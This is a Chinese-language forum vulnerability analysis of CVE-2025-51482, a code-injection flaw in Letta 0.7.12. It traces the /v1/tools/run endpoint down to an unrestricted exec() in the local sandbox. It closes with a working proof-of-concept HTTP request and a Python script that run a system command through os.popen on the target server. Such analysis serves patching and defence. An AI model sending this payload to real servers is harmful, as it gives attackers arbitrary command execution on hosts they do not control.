问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
CVE-2025-51482 漏洞分析:Letta AI 组件代码注入导致远程命令执行(RCE)
漏洞分析
该漏洞允许攻击者通过 `/v1/tools/run` 接口,利用精心构造的 payload 在目标服务器上执行任意 Python 代码或系统命令。系统原设计意图是通过沙箱机制限制工具执行的权限,但此安全机制被绕过。
漏洞说明 ==== 该漏洞允许攻击者通过 **`/v1/tools/run`** 接口,利用精心构造的 payload 在目标服务器上执行任意 Python 代码或系统命令。系统原设计意图是通过沙箱机制限制工具执行的权限,但此安全机制被绕过。 影响版本 ==== Letta 0.7.12 代码结构 ==== - alembic:迁移脚本的根目录 - assets:资源文件 - certs:证书 - db:数据库目录 - examples:存放示例代码、完整应用、教程文件、配置文件目录 - letta:源文件夹 - prompts:引导文件夹 - sandbox:沙箱 - scripts:python安装目录 - tests:所有测试代码的目录 分析漏洞成因 ====== ### 1.API端点 首先漏洞地址在**letta/server/rest\_api/routers/v1/tools.py中**  ```php @router.post("/run", response_model=ToolReturnMessage, operation_id="run_tool_from_source") def run_tool_from_source( server: SyncServer = Depends(get_letta_server), request: ToolRunFromSource = Body(...), ): """ Attempt to build a tool from source, then run it on the provided arguments """ actor = server.user_manager.get_user_or_default(user_id=actor_id) try: return server.run_tool_from_source( tool_source=request.source_code, tool_source_type=request.source_type, tool_args=request.args, tool_env_vars=request.env_vars, tool_name=request.name, tool_args_json_schema=request.args_json_schema, tool_json_schema=request.json_schema, actor=actor, ) except LettaToolCreateError as e: # HTTP 400 == Bad Request print(f"Error occurred during tool creation: {e}") # print the full stack trace import traceback print(traceback.format_exc()) raise HTTPException(status_code=400, detail=str(e)) except Exception as e: # Catch other unexpected errors and raise an internal server error print(f"Unexpected error occurred: {e}") raise HTTPException(status_code=500, detail=f"An unexpected error occurred: {str(e)}") ``` 这就是漏洞的起点 #### 1.1路由定义 `@router.post("/run", response_model=ToolReturnMessage, operation_id="run_tool_from_source")` POST请求到/run路径,然后返回的类型为ToolReturnMessage #### 1.2请求处理函数 ```php def run_tool_from_source( server: SyncServer = Depends(get_letta_server), request: ToolRunFromSource = Body(...), ): ``` server通过get\_letta\_server依赖获取,ToolRunFromSource对象包括所有必要参数 #### 1.3核心代码 ```php actor = server.user_manager.get_user_or_default(user_id=actor_id) try: return server.run_tool_from_source( tool_source=request.source_code, tool_source_type=request.source_type, tool_args=request.args, tool_env_vars=request.env_vars, tool_name=request.name, tool_args_json_schema=request.args_json_schema, tool_json_schema=request.json_schema, actor=actor, ) ``` 获取用户身份,调用服务器核心方法执行工具 #### 1.4异常处理 ##### 1.4.1工具创建错误(400) ```php except LettaToolCreateError as e: # HTTP 400 == Bad Request print(f"Error occurred during tool creation: {e}") # print the full stack trace import traceback print(traceback.format_exc()) raise HTTPException(status_code=400, detail=str(e)) ``` 工具编译/创建阶段的错误,返回客户端错误状态码 ##### 1.4.2其他意外错误(500) ```php except Exception as e: # Catch other unexpected errors and raise an internal server error print(f"Unexpected error occurred: {e}") raise HTTPException(status_code=500, detail=f"An unexpected error occurred: {str(e)}") ``` 捕获所有未预期的异常,返回服务器错误状态码 可以看到这个端点直接接收了用户提交的source\_code、env\_vars等参数并且没有对输入内容进行安全校验。跟踪核心方法 ### 2.调用核心方法 追踪**run\_tool\_from\_source**方法到 letta/server/server.py中 代码较长不截图了 ```php def run_tool_from_source( self, actor: User, tool_args: Dict[str, str], tool_source: str, tool_env_vars: Optional[Dict[str, str]] = None, tool_source_type: Optional[str] = None, tool_name: Optional[str] = None, tool_args_json_schema: Optional[Dict[str, Any]] = None, tool_json_schema: Optional[Dict[str, Any]] = None, ) -> ToolReturnMessage: """Run a tool from source code""" if tool_source_type is not None and tool_source_type != "python": raise ValueError("Only Python source code is supported at this time") # If tools_json_schema is explicitly passed in, override it on the created Tool object if tool_json_schema: tool = Tool(name=tool_name, source_code=tool_source, json_schema=tool_json_schema) else: # NOTE: we're creating a floating Tool object and NOT persisting to DB tool = Tool( name=tool_name, source_code=tool_source, args_json_schema=tool_args_json_schema, ) assert tool.name is not None, "Failed to create tool object" # TODO eventually allow using agent state in tools agent_state = None # Next, attempt to run the tool with the sandbox try: tool_execution_result = ToolExecutionSandbox(tool.name, tool_args, actor, tool_object=tool).run( agent_state=agent_state, additional_env_vars=tool_env_vars ) return ToolReturnMessage( id="null", tool_call_id="null", date=get_utc_time(), status=tool_execution_result.status, tool_return=str(tool_execution_result.func_return), stdout=tool_execution_result.stdout, stderr=tool_execution_result.stderr, ) except Exception as e: func_return = get_friendly_error_msg(function_name=tool.name, exception_name=type(e).__name__, exception_message=str(e)) return ToolReturnMessage( id="null", tool_call_id="null", date=get_utc_time(), status="error", tool_return=func_return, stdout=[], stderr=[traceback.format_exc()], ) ``` #### 1.参数说明 ```php def run_tool_from_source( self, actor: User, #执行操作的用户 tool_args: Dict[str, str], #工具参数 tool_source: str, #工具源代码 tool_env_vars: Optional[Dict[str, str]] = None, #环境变量 tool_source_type: Optional[str] = None, #源码类型 tool_name: Optional[str] = None, #工具名称 tool_args_json_schema: Optional[Dict[str, Any]] = None, #参数JSON schema tool_json_schema: Optional[Dict[str, Any]] = None, #完整JSON schema ) -> ToolReturnMessage: ``` #### 2.执行 ```php f tool_source_type is not None and tool_source_type != "python": raise ValueError("Only Python source code is supported at this time") # If tools_json_schema is explicitly passed in, override it on the created Tool object if tool_json_schema: tool = Tool(name=tool_name, source_code=tool_source, json_schema=tool_json_schema) else: # NOTE: we're creating a floating Tool object and NOT persisting to DB tool = Tool( name=tool_name, source_code=tool_source, args_json_schema=tool_args_json_schema, ) assert tool.name is not None, "Failed to create tool object" # TODO eventually allow using agent state in tools agent_state = None # Next, attempt to run the tool with the sandbox try: tool_execution_result = ToolExecutionSandbox(tool.name, tool_args, actor, tool_object=tool).run( agent_state=agent_state, additional_env_vars=tool_env_vars ) return ToolReturnMessage( id="null", tool_call_id="null", date=get_utc_time(), status=tool_execution_result.status, tool_return=str(tool_execution_result.func_return), stdout=tool_execution_result.stdout, stderr=tool_execution_result.stderr, ) except Exception as e: func_return = get_friendly_error_msg(function_name=tool.name, exception_name=type(e).__name__, exception_message=str(e)) return ToolReturnMessage( id="null", tool_call_id="null", date=get_utc_time(), status="error", tool_return=func_return, stdout=[], stderr=[traceback.format_exc()], ``` 首先去验证,目前只有Python代码,其次是创建一个临时的Tool对象,然后初始化执行环境,创建ToolExecutionSandbox实例,调用run()方法来执行工具,最后将执行结果包装成API响应格式。最下面一段代码是异常处理 ### 3.沙箱处理 追踪**ToolExecutionSandbox**到 letta/services/tool\_executor/tool\_execution\_sandbox.py  ```php def run( self, agent_state: Optional[AgentState] = None, additional_env_vars: Optional[Dict] = None, ) -> ToolExecutionResult: """ Run the tool in a sandbox environment. Args: agent_state (Optional[AgentState]): The state of the agent invoking the tool additional_env_vars (Optional[Dict]): Environment variables to inject into the sandbox Returns: ToolExecutionResult: Object containing tool execution outcome (e.g. status, response) """ if tool_settings.e2b_api_key and not self.privileged_tools: logger.debug(f"Using e2b sandbox to execute {self.tool_name}") result = self.run_e2b_sandbox(agent_state=agent_state, additional_env_vars=additional_env_vars) else: logger.debug(f"Using local sandbox to execute {self.tool_name}") result = self.run_local_dir_sandbox(agent_state=agent_state, additional_env_vars=additional_env_vars) # Log out any stdout/stderr from the tool run logger.debug(f"Executed tool '{self.tool_name}', logging output from tool run: \n") for log_line in (result.stdout or []) + (result.stderr or []): logger.debug(f"{log_line}") logger.debug(f"Ending output log from tool run.") # Return result return result ``` 首先沙箱去选择一个逻辑 E2B沙箱:当配置了**e2b\_api\_key**且不是特权工具; 本地沙箱:其他所有情况(默认选择)。 选择完之后就是去执行 E2B沙箱:需要API秘钥,调用**run\_e2b\_sandbox()**;‘ 本地沙箱:直接使用,调用**run\_local\_dir\_sandbox()**。 最后是返回沙箱执行的结果。 ### 4.Sink点 跟踪**run\_local\_dir\_sandbox**发现还是在这个目录 ```php def run_local_dir_sandbox( self, agent_state: Optional[AgentState] = None, additional_env_vars: Optional[Dict] = None ) -> ToolExecutionResult: sbx_config = self.sandbox_config_manager.get_or_create_default_sandbox_config(sandbox_type=SandboxType.LOCAL, actor=self.user) local_configs = sbx_config.get_local_config() # Get environment variables for the sandbox env = os.environ.copy() env_vars = self.sandbox_config_manager.get_sandbox_env_vars_as_dict(sandbox_config_id=sbx_config.id, actor=self.user, limit=100) env.update(env_vars) # Get environment variables for this agent specifically if agent_state: env.update(agent_state.get_agent_env_vars_as_dict()) # Finally, get any that are passed explicitly into the `run` function call if additional_env_vars: env.update(additional_env_vars) # Safety checks if not os.path.exists(local_configs.sandbox_dir) or not os.path.isdir(local_configs.sandbox_dir): logger.warning(f"Sandbox directory does not exist, creating: {local_configs.sandbox_dir}") os.makedirs(local_configs.sandbox_dir) # Write the code to a temp file in the sandbox_dir with tempfile.NamedTemporaryFile(mode="w", dir=local_configs.sandbox_dir, suffix=".py", delete=False) as temp_file: if local_configs.use_venv: # If using venv, we need to wrap with special string markers to separate out the output and the stdout (since it is all in stdout) code = self.generate_execution_script(agent_state=agent_state, wrap_print_with_markers=True) else: code = self.generate_execution_script(agent_state=agent_state) temp_file.write(code) temp_file.flush() temp_file_path = temp_file.name try: if local_configs.use_venv: return self.run_local_dir_sandbox_venv(sbx_config, env, temp_file_path) else: return self.run_local_dir_sandbox_directly(sbx_config, env, temp_file_path) except Exception as e: logger.error(f"Executing tool {self.tool_name} has an unexpected error: {e}") logger.error(f"Logging out tool {self.tool_name} auto-generated code for debugging: \n\n{code}") raise e finally: # Clean up the temp file os.remove(temp_file_path) ``` 首先是配置获取和环境设置,然后就是环境变量合并策略优先级:**additional\_env\_vars > agent\_state > 沙箱配置 > 系统环境**;然后就是确保沙箱目录存在,如果不存在自动创建缺失的目录。最终要的是执行策略的选择 ```php try: if local_configs.use_venv: return self.run_local_dir_sandbox_venv(sbx_config, env, temp_file_path) else: return self.run_local_dir_sandbox_directly(sbx_config, env, temp_file_path) ``` venv模式:在虚拟环境中通过子进程执行; 直接模式:在当前进程上下文中执行。 继续追踪**run\_local\_dir\_sandbox\_directly**函数就会发现这里就是最终产生漏洞的地方 ```php def run_local_dir_sandbox_directly( self, sbx_config: SandboxConfig, env: Dict[str, str], temp_file_path: str, ) -> ToolExecutionResult: status = "success" func_return, agent_state, stderr = None, None, None old_stdout = sys.stdout old_stderr = sys.stderr captured_stdout, captured_stderr = io.StringIO(), io.StringIO() sys.stdout = captured_stdout sys.stderr = captured_stderr try: with self.temporary_env_vars(env): # Read and compile the Python script with open(temp_file_path, "r", encoding="utf-8") as f: source = f.read() code_obj = compile(source, temp_file_path, "exec") # Provide a dict for globals. globals_dict = dict(env) # or {} # If you need to mimic `__main__` behavior: globals_dict["__name__"] = "__main__" globals_dict["__file__"] = temp_file_path # Execute the compiled code log_event(name="start exec", attributes={"temp_file_path": temp_file_path}) exec(code_obj, globals_dict) log_event(name="finish exec", attributes={"temp_file_path": temp_file_path}) # Get result from the global dict func_result = globals_dict.get(self.LOCAL_SANDBOX_RESULT_VAR_NAME) func_return, agent_state = self.parse_best_effort(func_result) except Exception as e: func_return = get_friendly_error_msg( function_name=self.tool_name, exception_name=type(e).__name__, exception_message=str(e), ) traceback.print_exc(file=sys.stderr) status = "error" # Restore stdout/stderr sys.stdout = old_stdout sys.stderr = old_stderr stdout_output = [captured_stdout.getvalue()] if captured_stdout.getvalue() else [] stderr_output = [captured_stderr.getvalue()] if captured_stderr.getvalue() else [] return ToolExecutionResult( status=status, func_return=func_return, agent_state=agent_state, stdout=stdout_output, stderr=stderr_output, sandbox_config_fingerprint=sbx_config.fingerprint(), ) ``` 这里的话只需要看最重要的代码 ```php try: with self.temporary_env_vars(env): # Read and compile the Python script with open(temp_file_path, "r", encoding="utf-8") as f: source = f.read() code_obj = compile(source, temp_file_path, "exec") # Provide a dict for globals. globals_dict = dict(env) # or {} # If you need to mimic `__main__` behavior: globals_dict["__name__"] = "__main__" globals_dict["__file__"] = temp_file_path # Execute the compiled code log_event(name="start exec", attributes={"temp_file_path": temp_file_path}) exec(code_obj, globals_dict) log_event(name="finish exec", attributes={"temp_file_path": temp_file_path}) # Get result from the global dict func_result = globals_dict.get(self.LOCAL_SANDBOX_RESULT_VAR_NAME) func_return, agent_state = self.parse_best_effort(func_result) ``` 这里是读取临时文件中的源代码,然后编译代码为字节码,接下来就是准备全局命名空间(包括环境变量和必要的\_\_main\_\_属性),最后执行编译后的代码。 在以上的代码中发现并没有限制全局变量和模块的访问,则会完全信任并执行输入的代码,最后导致了任意代码执行。 POC === ```php POST /v1/tools/run HTTP/1.1Host: 127.0.0.1 Content-Type: application/json Content-Length: 223 { "source_code": "def test():n"""Test rce."""n import osn return os.popen('id').read()", "args": {}, "env_vars": { "PYTHONPATH": "/usr/lib/python3/dist-packages" }, "name": "test" } ``` 脚本 == ```php import requests import json url = "http://localhost:8283/v1/tools/run" # 恶意代码:执行系统"id"命令并返回结果 payload = { "source_code": "def test():\n \"\"\"Test function to execute system commands.\"\"\"\n import os\n return os.popen('id').read()", "args": {}, "env_vars": {"PYTHONPATH":"/usr/lib/python3/dist-packages"}, "name": "test" } headers = {"Content-Type": "application/json"} response = requests.post(url, json=payload, headers=headers) ```
发表于 2025-09-15 15:12:37
阅读 ( 269 )
分类:
开发框架
0 推荐
收藏
0 条评论
请先
登录
后评论
Gscsed
1 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!